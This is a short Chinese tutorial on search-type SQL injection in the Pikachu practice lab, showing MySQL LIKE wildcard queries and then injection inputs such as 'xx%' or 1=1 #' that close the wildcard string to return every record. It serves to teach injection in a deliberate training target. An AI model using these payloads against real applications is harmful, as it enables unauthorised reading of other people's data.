Pikachu靶场 搜索型SQL注入

MySQLbin 路径下打开 cmd ,输入下面的命令,再输入 数据库的密码

复制代码
mysql -u root -p

show databases;

use pikachu

desc member;

select id,username,email from member;

select id,username,email from member where id=1;

select id,username,email from member where username='vince';

select id,username,email from member where username='vin';

%vin :查询 以vin结尾 的名称

复制代码
select id,username,email from member where username='%vin';

select id,username,email from member where username like '%vin';

select id,username,email from member where username like 'vin%';

select id,username,email from member where username like '%vin%';

select id,username,email from member where username like '%%vin%%';

Pikachu靶场里查询

复制代码
xx' or 1=1 #

要注意 闭合% ,让信息查的全

复制代码
xx%' or 1=1 #

%xx%' or 1=1 #
相关推荐
2401_897930064 分钟前
使用Docker轻松部署Neo4j图数据库
数据库·docker·neo4j
诗句藏于尽头13 分钟前
Django模型与数据库表映射的两种方式
数据库·python·django
寻星探路1 小时前
数据库造神计划第六天---增删改查(CRUD)(2)
java·大数据·数据库
盖世英雄酱581362 小时前
Read timed out问题 排查
java·数据库·后端
云动雨颤3 小时前
Spring Boot配置优化:Tomcat+数据库+缓存+日志,全场景教程
数据库·spring boot·tomcat
RestCloud3 小时前
Kafka实时数据管道:ETL在流式处理中的应用
数据库·kafka·api
懒虫虫~3 小时前
通过内存去重替换SQL中distinct,优化SQL查询效率
java·sql·慢sql治理
逛逛GitHub3 小时前
1 个神级智能问数工具,刚开源就 1500 Star 了。
sql·github
寻星探路4 小时前
数据库造神计划第九天---增删改查(CRUD)(5)
数据库